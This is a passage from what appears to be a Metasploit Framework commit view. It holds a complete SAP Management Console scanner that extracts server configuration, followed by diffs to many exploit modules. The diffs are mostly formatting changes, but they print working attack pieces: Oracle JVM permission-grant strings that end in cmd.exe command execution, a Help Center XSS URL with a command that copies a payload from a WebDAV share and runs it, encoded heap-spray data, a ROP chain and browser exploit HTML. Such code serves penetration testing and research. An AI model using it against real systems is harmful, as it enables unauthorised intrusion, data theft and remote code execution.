print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
ns1 = 'ns1:GetProcessParameter'
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi
data << '" xmlns:xs="' + xs + '">' + "\r\n"
data << '<SOAP-ENV:Header>' + "\r\n"
data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
data << '<enableSession>true</enableSession>' + "\r\n"
data << '</sapsess:Session>' + "\r\n"
data << '</SOAP-ENV:Header>' + "\r\n"
data << '<SOAP-ENV:Body>' + "\r\n"
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"></' + ns1 + '>' + "\r\n"
data << '</SOAP-ENV:Body>' + "\r\n"
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
begin
res = send_request_raw({
'uri' => "/#{datastore['URI']}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '""',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 30)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
if res.code == 200
case res.body
when nil
# Nothing
when /<parameter>(.*)<\/parameter>/i
body = []
body = res.body
success = true
end
elsif res.code == 500
case res.body
when /<faultstring>(.*)<\/faultstring>/i
faultcode = $1.strip
fault = true
end
else
print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.")
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
return
end
if success
#Only stoor loot if MATCH is not selected
if datastore['MATCH'].empty?
print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot")
store_loot(
"sap.getprocessparameters",
"text/xml",
rhost,
res.body,
".xml"
)
else
name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n'])
print_status("[SAP] Regex match selected, skipping loot storage")
print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}")
saptbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "[SAP] Process Parameters",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
[
"Name",
"Description",
"Value"
])
xmldata = REXML::Document.new(body)
xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/'
xmlpath << '/SAPControl:GetProcessParameterResponse'
xmlpath << '/parameter/item'
xmldata.elements.each(xmlpath) do | ele |
if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/)
name = ele.elements["name"].text if not ele.elements["name"].nil?
desc = ele.elements["description"].text if not ele.elements["description"].nil?
desc = '' if desc.nil?
val = ele.elements["value"].text if not ele.elements["value"].nil?
val = '' if val.nil?
saptbl << [ name, desc, val ]
end
end
print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty?
end
return
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return
else
# Something has gone horribly wrong
print_error("#{rhost}:#{rport} [SAP] failed to request environment")
return
end
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SAP Management Console Get Process Parameters',
'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to output a SAP process parameters and
configuration settings through the SAP Management Console SOAP Interface.
},
'References' =>
[
# General
[ 'URL', 'http://blog.c22.cc' ]
],
'Author' => [ 'Chris John Riley' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(50013),
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
OptString.new('MATCH', [false, 'Display matches e.g login/', '']),
], self.class)
register_autofilter_ports([ 50013 ])
deregister_options('RHOST')
end
def rport
datastore['RPORT']
end
def run_host(ip)
res = send_request_cgi({
'uri' => "/#{datastore['URI']}",
'method' => 'GET',
'headers' =>
{
'User-Agent' => datastore['UserAgent']
}
}, 25)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
getprocparam(ip)
end
def getprocparam(rhost)
verbose = datastore['VERBOSE']
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
ns1 = 'ns1:GetProcessParameter'
data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="' + soapenv + '" xmlns:xsi="' + xsi
data << '" xmlns:xs="' + xs + '">' + "\r\n"
data << '<SOAP-ENV:Header>' + "\r\n"
data << '<sapsess:Session xlmns:sapsess="' + sapsess + '">' + "\r\n"
data << '<enableSession>true</enableSession>' + "\r\n"
data << '</sapsess:Session>' + "\r\n"
data << '</SOAP-ENV:Header>' + "\r\n"
data << '<SOAP-ENV:Body>' + "\r\n"
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl"></' + ns1 + '>' + "\r\n"
data << '</SOAP-ENV:Body>' + "\r\n"
data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
begin
res = send_request_raw({
'uri' => "/#{datastore['URI']}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '""',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 30)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
if res.code == 200
case res.body
when nil
# Nothing
when /<parameter>(.*)<\/parameter>/i
body = []
body = res.body
success = true
end
elsif res.code == 500
case res.body
when /<faultstring>(.*)<\/faultstring>/i
faultcode = $1.strip
fault = true
end
else
print_error("#{rhost}:#{rport} [SAP] Unable to communicate with remote host.")
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
return
end
if success
#Only stoor loot if MATCH is not selected
if datastore['MATCH'].empty?
print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot")
store_loot(
"sap.getprocessparameters",
"text/xml",
rhost,
res.body,
".xml"
)
else
name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n'])
print_status("[SAP] Regex match selected, skipping loot storage")
print_status("#{rhost}:#{rport} [SAP] Attempting to display configuration matches for #{name_match}")
saptbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "[SAP] Process Parameters",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
[
"Name",
"Description",
"Value"
])
xmldata = REXML::Document.new(body)
xmlpath = '/SOAP-ENV:Envelope/SOAP-ENV:Body/'
xmlpath << '/SAPControl:GetProcessParameterResponse'
xmlpath << '/parameter/item'
xmldata.elements.each(xmlpath) do | ele |
if not datastore['MATCH'].empty? and ele.elements["name"].text.match(/#{name_match}/)
name = ele.elements["name"].text if not ele.elements["name"].nil?
desc = ele.elements["description"].text if not ele.elements["description"].nil?
desc = '' if desc.nil?
val = ele.elements["value"].text if not ele.elements["value"].nil?
val = '' if val.nil?
saptbl << [ name, desc, val ]
end
end
print_status("[SAP] Process Parameter Results for #{name_match}\n #{saptbl.to_s}") if not saptbl.to_s.empty?
end
return
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return
else
# Something has gone horribly wrong
print_error("#{rhost}:#{rport} [SAP] failed to request environment")
return
end
end
end
modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_service_discovery.rb
Executable → Regular
View File
modules/auxiliary/scanner/voice/recorder.rb
+2 -2
View File
@@ -1,5 +1,5 @@
##
# $Id: call_scanner.rb 13183 2011-07-15 15:33:35Z egypt $
# $Id$
##
##
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Telephone Line Voice Scanner',
'Version' => '$Revision: 13183 $',
'Version' => '$Revision$',
'Description' => 'This module dials a range of phone numbers and records audio from each answered call',
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
modules/auxiliary/server/capture/smb.rb
+6 -4
View File
@@ -61,10 +61,12 @@ class Metasploit3 < Msf::Auxiliary
register_advanced_options(
[
OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]),
OptBool.new("NTLM_UseNTLM2_session", [ true, "activate the 'Negotiate NTLM2 key' flag in ntlm authentification when smb extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)", false ]),
OptBool.new("USE_GSS_NEGOCIATION", [ true, "Send an gss_security blob in smb_negociate response when smb extended security is set, when this flag is not set windows will respond without gss encapsulation, ubuntu will still use gss", true ]),
OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ])
OptBool.new("SMB_EXTENDED_SECURITY", [ true, "Use smb extended security negociation, when set client will use ntlmssp, if not then client will use classic lanman authentification", false ]),
OptBool.new("NTLM_UseNTLM2_session", [ true, "Activate the 'negociate NTLM2 key' flag in NTLM authentication. " +
"When SMB extended security negociation is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)", false ]),
OptBool.new("USE_GSS_NEGOCIATION", [ true, "Send a gss_security blob in smb_negociate response when SMB extended security is set. " +
"When this flag is not set, Windows will respond without gss encapsulation, Ubuntu will still use gss.", true ]),
OptString.new('DOMAIN_NAME', [ true, "The domain name used during smb exchange with smb extended security set ", "anonymous" ])
], self.class)
end
modules/auxiliary/server/webkit_xslt_dropper.rb
+1 -1
View File
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
<content><![CDATA[#{content}]]></content>
<!-- The XSLT stylesheet header, including the "sx" extension -->
<xsl:stylesheet id="fragment" version="1.0"
<xsl:stylesheet id="fragment" version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:sx="http://icl.com/saxon"
extension-element-prefixes="sx"
modules/auxiliary/spoof/wifi/airpwn.rb
+3 -3
View File
@@ -98,14 +98,14 @@ class Metasploit3 < Msf::Auxiliary
end
rescue EOFError
rescue ::Exception => e
print_error("AIRPWN: failed to parse response file " \
print_error("AIRPWN: failed to parse response file " +
"#{r['file']}, #{e.class} #{e} #{e.backtrace}")
end
end
else
if r["file"] then
print_error "AIRPWN: Both 'response' and 'file' in yaml config, " \
"defaulting to 'response'"
print_error "AIRPWN: Both 'response' and 'file' in yaml config, " +
"defaulting to 'response'"
end
r["txresponse"] = r["response"]
modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
+10 -4
View File
@@ -47,10 +47,16 @@ class Metasploit3 < Msf::Auxiliary
name = Rex::Text.rand_text_alpha(rand(10) + 1)
package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','"
package1 << "<" << "<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
"CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','"
package1 << "<" << "<ALL FILES>>','execute','ENABLED' from dual;" +
"BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
"CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;" +
"BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
"CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;" +
"BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
os_code = "select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ' #{datastore['CMD']}')from dual"
modules/auxiliary/vsploit/pii/web_pii.rb
+2 -2
View File
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
def create_page
# Webpage Title
title = "vSploit PII Webserver"
sheep =<<EOF
sheep = <<-EOS
__________
< baaaaah! >
---------
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
// ( // /
~~~~~ ~~~~
EOF
EOS
page = ""
page << "<html>\n<head>\n"
modules/exploits/linux/pptp/poptop_negative_read.rb
+4 -1
View File
@@ -79,7 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),
OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),
OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. " +
"ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). " +
"If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data " +
"(these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),
OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
], self.class)
modules/exploits/multi/http/glassfish_deployer.rb
Executable → Regular
+10 -10
View File
@@ -291,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request(path, @verbs['POST'], session, data, ctype)
if (not res)
print_error("Undeployment failed on #{path} - No Response")
else
else
if res.code < 200 or res.code >= 300
print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}")
end
@@ -333,10 +333,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
#
# Return the formatted version of the POST data
#
def format_2_x_war(boundary,name,value=nil, war=nil)
data = ''
# Return the formatted version of the POST data
#
def format_2_x_war(boundary,name,value=nil, war=nil)
data = ''
data << boundary
data << "\r\nContent-Disposition: form-data; name=\"form:title:sheet1:section1:prop1:fileupload\"; "
@@ -344,8 +344,8 @@ class Metasploit3 < Msf::Exploit::Remote
data << war
data << "\r\n"
return data
end
return data
end
#
# Return the formatted version of the POST data
@@ -555,8 +555,8 @@ class Metasploit3 < Msf::Exploit::Remote
ctype = "multipart/form-data; boundary=#{boundary}"
elsif version == '2.x' or version == '9.x'
ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
typefield = ''
start = ''
typefield = ''
start = ''
else
ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
end
@@ -687,7 +687,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.code.to_i == 200 and res.body.match(p) != nil)
success = true
end
end
end
end
if success == true
modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
+2 -2
View File
@@ -126,8 +126,8 @@ class Metasploit3 < Msf::Exploit::Remote
header =
XDR.encode(0) * 7 +
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
hostname, 'system', rand_text_alpha(16))
body =
modules/exploits/solaris/sunrpc/sadmind_exec.rb
+2 -2
View File
@@ -106,8 +106,8 @@ class Metasploit3 < Msf::Exploit::Remote
def sadmind_request(host, command)
header =
XDR.encode(0) * 7 +
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
host, 'system', '../../../bin/sh')
body =
modules/exploits/unix/webapp/php_vbulletin_template.rb
+3 -1
View File
@@ -86,7 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' +
'Support for chunked encoded requests was added to PHP on 12/15/2005. ' +
'Try disabling HTTP::chunked and trying again.'
end
end
end
modules/exploits/unix/webapp/php_xmlrpc_eval.rb
+3 -1
View File
@@ -91,7 +91,9 @@ class Metasploit3 < Msf::Exploit::Remote
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' +
'Support for chunked encoded requests was added to PHP on 12/15/2005. ' +
'Try disabling HTTP::chunked and trying again.'
end
end
end
modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
+4 -3
View File
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# build the exploit
content = %Q|
content = <<-EOS
<html>
<head>
<title>msf</title>
@@ -112,12 +112,13 @@ ID=Abysssec width=600 height=430 VIEWASTEXT>
<param name=swStretchStyle value=fill>
<param name=PlayerVersion value=11>
<PARAM NAME=bgColor VALUE=#FFFFFF>
<embed src="#{dirname}.DIR" bgColor=#FFFFFF width=600 height=430 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true' swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=fill
<embed src="#{dirname}.DIR" bgColor=#FFFFFF width=600 height=430 swRemote="swSaveEnabled='true' swVolume='true' swRestart='true'
swPausePlay='true' swFastForward='true' swContextMenu='true' " swStretchStyle=fill
type="application/x-director" PlayerVersion=11 pluginspage="http://www.macromedia.com/shockwave/download/"></embed>
</object>
</body>
</html>
|
EOS
# Transmit the response to the client
path = request.uri
modules/exploits/windows/browser/citrix_gateway_actx.rb
+1 -1
View File
@@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote
'<param name="vip" value="255.255.255.255">'+
'</object>';
} else {
alert('Internal Error');
alert('Internal Error');
}
|
# the ret slide gets executed via call [esi+45b]
modules/exploits/windows/browser/mozilla_interleaved_write.rb
+2 -2
View File
@@ -277,7 +277,7 @@ else {
custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate()
end
return %Q|
return <<-EOS
<html>
<body>
<div style="visibility:hidden;width:0px;height:0px">
@@ -291,7 +291,7 @@ else {
<script type="text/javascript">
#{custom_js}
</script></body></html>
|
EOS
end
modules/exploits/windows/browser/mozilla_mchannel.rb
+3 -3
View File
@@ -95,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote
))
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
modules/exploits/windows/browser/ms08_078_xml_corruption.rb
+14 -6
View File
@@ -115,7 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
html = %Q|<html>
html = <<-EOS
<html>
<head>
<script language="javascript">
function forward() {
@@ -132,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
<object>
</body>
</html>
|
EOS
@state[token] = :start
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
@@ -172,6 +173,13 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport} token=#{@state[token]}...")
html = ""
data = "==gPOFEUT9CPK4DVYVEV9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQ" +
"EBiTBB1U8ogPM1EVI1zUBRVQNJ1TGFEVBREID1DRMZUQUFERgk0I9MkUTFEVBREI" +
"OFEUTxjC+QFWFRVPTFEVB1kUPZUQUFERgMUPExkRBRVQEBSSj0zQSNVQUFERg4UQ" +
"QNFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U" +
"8ogPM1EWvwjPJ1DRJBCTNhFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREI" +
"JNSPDJ1UBRVQEBiVJREP"
data = data.reverse.unpack("m*")[0]
#
@@ -180,7 +188,6 @@ class Metasploit3 < Msf::Exploit::Remote
if(@state[token] == :dll)
addr_a,addr_b = [vaddr].pack("V").unpack("v*").map{|v| "&##{v};" }
data = "==gPOFEUT9CPK4DVYVEV9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U8ogPM1EVI1zUBRVQNJ1TGFEVBREID1DRMZUQUFERgk0I9MkUTFEVBREIOFEUTxjC+QFWFRVPTFEVB1kUPZUQUFERgMUPExkRBRVQEBSSj0zQSNVQUFERg4UQQNFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U8ogPM1EWvwjPJ1DRJBCTNhFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiVJREP".reverse.unpack("m*")[0]
bxml = Rex::Text.to_hex(%Q|
<XML ID=I>
<X>
@@ -235,7 +242,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Heap spray mode")
addr_a,addr_b = [0x0c0c0c0c].pack("V").unpack("v*").map{|v| "&##{v};" }
data = "==gPOFEUT9CPK4DVYVEV9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U8ogPM1EVI1zUBRVQNJ1TGFEVBREID1DRMZUQUFERgk0I9MkUTFEVBREIOFEUTxjC+QFWFRVPTFEVB1kUPZUQUFERgMUPExkRBRVQEBSSj0zQSNVQUFERg4UQQNFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U8ogPM1EWvwjPJ1DRJBCTNhFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiVJREP".reverse.unpack("m*")[0]
bxml = Rex::Text.to_hex(%Q|
<XML ID=I>
<X>
@@ -268,7 +274,8 @@ class Metasploit3 < Msf::Exploit::Remote
rand_html = rand_text_english(rand(400) + 500)
html = %Q|<html>
html = <<-EOS
<html>
<head>
<script>
var #{var_memory} = new Array();
@@ -297,7 +304,8 @@ class Metasploit3 < Msf::Exploit::Remote
#{rand_html}
</body>
</html>
|
EOS
end
# Transmit the compressed response to the client
modules/exploits/windows/browser/ms10_002_aurora.rb
+3 -2
View File
@@ -115,7 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote
var_start = rand_text_alpha(rand(100) + 1)
rand_html = rand_text_english(rand(400) + 500)
js = %Q|var #{var_element} = "COMMENT";
js = <<-EOS
var #{var_element} = "COMMENT";
var #{var_el_array} = new Array();
for (i = 0; i < 1300; i++)
{
@@ -148,7 +149,7 @@ for (i = 0; i < #{var_el_array}.length; i++)
}
var t = #{var_event}.srcElement;
}
|
EOS
js_encoded = encrypt_js(js, @javascript_encode_key)
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
+3 -1
View File
@@ -151,7 +151,9 @@ class Metasploit3 < Msf::Exploit::Remote
# iframe request inbound from either WMP or IE7
if request.uri.match(/#{@start_help}/)
help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
help_html = <<-EOS
<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">
EOS
rand_vbs = rand_text_alpha(rand(2)+1) + ".vbs"
copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^
modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+1 -2
View File
@@ -184,8 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
if mytarget['Rop']
# !mona -m msvcr71 rop
code =
[
code = [
0x7c376402, # POP EBP # RETN [msvcr71.dll]
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
+1 -1
View File
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
